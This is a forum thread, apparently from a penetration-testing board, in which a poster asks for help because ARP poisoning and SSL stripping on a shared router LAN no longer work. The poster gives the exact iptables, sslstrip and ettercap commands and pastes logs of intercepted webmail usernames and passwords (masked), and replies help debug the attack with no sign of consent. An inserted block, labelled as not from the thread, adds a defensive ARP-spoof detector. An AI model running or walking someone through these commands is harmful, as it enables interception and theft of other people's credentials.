Well, here is the problem, I will post what I'm doing, hoping you can help me or any advice will be appreciated:
Using ettercap cannot sniff.
Cannot ping the router, or any other IPs, packets are just dropped.
Using sslstrip cannot strip anything.
Anyway, I can access the internet.
I used nmap to get an idea of what the LAN is and saw all 3 IPs. But one of the laptops is hosting what appears to be Apache on port 5835 (HTTPD V2).
I just cannot ping that PC; by the way, this PC has a name: xxxx.lan (192.xxx.xxx.64), all other ports are closed, except 5835 (open).
I see that all nmap reports hand out the IP, but that one has the xxxx.lan?..
Local domain?
Do ettercap, sslstrip, arpspoofing have problems with .local domains?
Any idea?
I don't really get what you're trying to do here... Try Yamas, it's a script I wrote for sniffing. You can either use arpspoof or ettercap by launching it with argument -e.
There is also a thread on the forums.
Running both KDE and GNOME BT5 flawlessly. Thank you !
Not working. Can't sniff anything with yamas either. Is there any relation with avahi (disabled) and sniffing?
What kind of sniffing are you trying to do anyway ?
What techniques did you try ?
Comax, first of all, I want to thank you for your help and interest, I really appreciate it.
Answering your questions, I use ettercap and sslstrip together (separate terminals) trying to avoid the certificate message in ettercap when sniffing.
I'm just trying to sniff in a LAN, with 4 ethernet ports and wifi access (it is a Thomson router TG585 v8). I used to do it almost every 2 days with success. But lately, I just cannot sniff anything at all.
I use in Terminal 1:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
sslstrip -p -f
In Terminal 2:
ettercap -Tqi eth1 -M arp:remote // /192.168.1.254/ -P autoadd
Just nothing can be sniffed now.
Tried yamas as advised by friend Comax, the same outcome.
Could be a firewall presence, a Domain?
Thanks...
Comax, I used the script yamas, but same thing, it is not sniffing...
Any idea?
I'm confused... I used to capture passwds but after a time, I'm not able to...
Tried the plugin from ettercap to check poison, it says that ARP poisoning did not take place...
How do you know nothing is being sniffed? Are you expecting ettercap to print output to the screen? It won't since you're passing the -q flag. Try passing -w as well to write the output to a file so you can examine it with wireshark or tcpdump.
+1 to shadowzero, you should examine the traffic (either after if you used -w or in real time, as it goes).
Did you try arpspoof ?
Have you tried different ways of poisoning ? One-way, two-way ? All the network, just separate targets ?
And sorry for the stupid question, but are you sure you're using the correct gateway ?
Now it's possible too that the router detects the flood of ARP requests and prevents it from working. Some dude reported it to be the case for him...
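Added example, not part of the thread and not any poster's code: a defender-side sketch of the kind of check the post above speculates a router might perform, flagging changed IP-to-MAC bindings, one MAC answering for several IPs, and bursts of ARP replies. The function name `detect`, its thresholds and the sample lines (shaped like `tcpdump -n arp` replies, with plain seconds as timestamps) are constructed assumptions.

```python
import re
from collections import defaultdict, deque

# Constructed sample: 192.168.1.254 plays the gateway, as in the thread's LAN.
SAMPLE = """\
1.0 ARP, Reply 192.168.1.254 is-at 00:25:aa:aa:aa:01, length 46
2.0 ARP, Reply 192.168.1.101 is-at 78:a0:bb:bb:bb:02, length 46
10.0 ARP, Reply 192.168.1.254 is-at 00:0e:cc:cc:cc:03, length 46
10.5 ARP, Reply 192.168.1.101 is-at 00:0e:cc:cc:cc:03, length 46
11.0 ARP, Reply 192.168.1.254 is-at 00:0e:cc:cc:cc:03, length 46
11.5 ARP, Reply 192.168.1.254 is-at 00:0e:cc:cc:cc:03, length 46
12.0 ARP, Reply 192.168.1.254 is-at 00:0e:cc:cc:cc:03, length 46
"""

REPLY = re.compile(r"^(\d+(?:\.\d+)?) ARP, Reply (\S+) is-at ([0-9a-f:]{17})", re.I)

def detect(lines, window=5.0, max_replies=3):
    """Return alerts as (kind, timestamp, detail) tuples, in log order."""
    ip_to_mac = {}                    # last MAC seen answering for each IP
    mac_to_ips = defaultdict(set)     # every IP a MAC has answered for
    recent = defaultdict(deque)       # per-MAC reply timestamps inside the window
    alerts = []
    for line in lines:
        m = REPLY.match(line.strip())
        if not m:
            continue                  # not an ARP reply line
        ts, ip, mac = float(m.group(1)), m.group(2), m.group(3).lower()
        old = ip_to_mac.get(ip)
        # A changed binding can be a legitimate DHCP reassignment; for the
        # gateway address it is the classic sign of cache poisoning.
        if old and old != mac:
            alerts.append(("binding-changed", ts, f"{ip}: {old} -> {mac}"))
        ip_to_mac[ip] = mac
        if ip not in mac_to_ips[mac]:
            mac_to_ips[mac].add(ip)
            if len(mac_to_ips[mac]) >= 2:
                ips = ", ".join(sorted(mac_to_ips[mac]))
                alerts.append(("mac-claims-many-ips", ts, f"{mac}: {ips}"))
        # Heuristic rate check: more than max_replies replies per window.
        q = recent[mac]
        q.append(ts)
        while ts - q[0] > window:
            q.popleft()
        if len(q) == max_replies + 1:
            alerts.append(("reply-flood", ts, mac))
    return alerts

if __name__ == "__main__":
    for alert in detect(SAMPLE.splitlines()):
        print(alert)
```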
Sorry for the delay. Yes, I'm isolating PCs when poisoning and the gateway is the same, has not been changed (192.168.1.254)... Same result..
I tried poisoning one and two ways (using ettercap and arpspoof separately).
Here is some data from ettercap before and after (when working and now):
************************************************** **************************************************
When it was working:
Listening on eth1... (Ethernet)
eth1 -> 00:0E:xx:xx:xx:xx 192.168.1.108 255.255.255.0
Privileges dropped to UID 1000 GID 1000...
28 plugins
39 protocol dissectors
53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services
Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
* |==================================================>| 100.00 %
5 hosts added to the hosts list...
ARP poisoning victims:
GROUP 1 : ANY (all the hosts in the list)
GROUP 2 : 192.168.1.254 00:25:xx:xx:xx
Starting Unified sniffing...
Text only Interface activated...
Hit 'h' for inline help
Activating autoadd plugin...
DHCP: [192.168.1.254] OFFER : 192.168.1.107 255.255.255.0 GW 192.168.1.254 DNS 192.168.1.254 ""
DHCP: [192.168.1.254] OFFER : 192.168.1.107 255.255.255.0 GW 192.168.1.254 DNS 192.168.1.254 ""
DHCP: [192.168.1.254] OFFER : 192.168.1.107 255.255.255.0 GW 192.168.1.254 DNS 192.168.1.254 ""
DHCP: [192.168.1.254] OFFER : 192.168.1.107 255.255.255.0 GW 192.168.1.254 DNS 192.168.1.254 ""
DHCP: [192.168.1.254] OFFER : 192.168.1.107 255.255.255.0 GW 192.168.1.254 DNS 192.168.1.254 ""
HTTP : 65.54.xxx.xx:80 -> USER: xxxx_xxx@hhhhh.com PASS: xxxxxx INFO: login.live.com/ppsecure/post.srf?wa=wsignin1.0&rpsnv=11&ct=1325176303&rver=6.1.6206.0&wp=MBI&wreply=http://
HTTP : 65.54.xx.xxx:80 -> USER: jjjjjjjjjj@ggggg.com PASS: jjjjjjjjjj INFO: /ppsecure/post.srf?wa=wsignin1.0&rpsnv=11&ct=1325176303&rver=6.1.6206.0&wp=MBI&wreply=http://
After (Not sniffing):
Scanning for merged targets (142 hosts)...
* |==================================================>| 100.00 %
4 hosts added to the hosts list...
ARP poisoning victims:
GROUP 1 : 192.168.1.64 00:E1:XX:XX:xx:xx
GROUP 1 : 192.168.1.101 78:A0:xx:xx:xx
GROUP 1 : 192.168.1.106 3C:74:xx:xx:xx
GROUP 2 : 192.168.1.254 08:xx:xx:xx:xx (This is the gateway)
Starting Unified sniffing...
Text only Interface activated...
Hit 'h' for inline help
Activating autoadd plugin...
DHCP: [192.168.1.254] ACK : 192.168.1.65 255.255.255.0 GW 192.168.1.254 DNS 192.168.1.254 "lan"
DHCP: [192.168.1.254] ACK : 192.168.1.65 255.255.255.0 GW 192.168.1.254 DNS 192.168.1.254 "lan"
DHCP: [192.168.1.254] ACK : 192.168.1.65 255.255.255.0 GW 192.168.1.254 DNS 192.168.1.254 "lan"
DHCP: [192.168.1.254] ACK : 192.168.1.65 255.255.255.0 GW 192.168.1.254 DNS 192.168.1.254 "lan"
autoadd: 192.168.1.70 00:1B:77:xx:xx:xx added to GROUP1
autoadd: 192.168.1.189 28:E7:CF:xx:xx:xx added to GROUP1
autoadd: 192.168.1.137 60:33:4B:xx:xx:xx added to GROUP1
************************************************** *******************************
In the info I can see something in these lines:
Before (when sniffing):
DHCP: [192.168.1.254] OFFER : 192.168.1.107 255.255.255.0 GW 192.168.1.254 DNS 192.168.1.254 ""
After (not sniffing)
DHCP: [192.168.1.254] OFFER : 192.168.1.107 255.255.255.0 GW 192.168.1.254 DNS 192.168.1.254 "lan"
At the end of each line, when sniffing : ""
When not sniffing: "lan"
When using the ettercap plugin "chk_poison" it says that it did not poison....
We all are in the same subnet (192.168.1.40-253 -- Range in router's DHCP server). I also use sslstrip along with ettercap and nothing in sslstrip.log, empty...
Using yamas, same thing, it does not sniff any passwords...
Any idea?
Wow man... Sorry, but I'm at a loss here.
To sum up :
It used to work.
Nothing changed.
It no longer works, despite the plethora of ways given to do it.
That is weird bro. Sure your router hasn't been updated for instance ? They don't really warn you when they do this...
Have you tried running it off a clean LiveCD/new install ?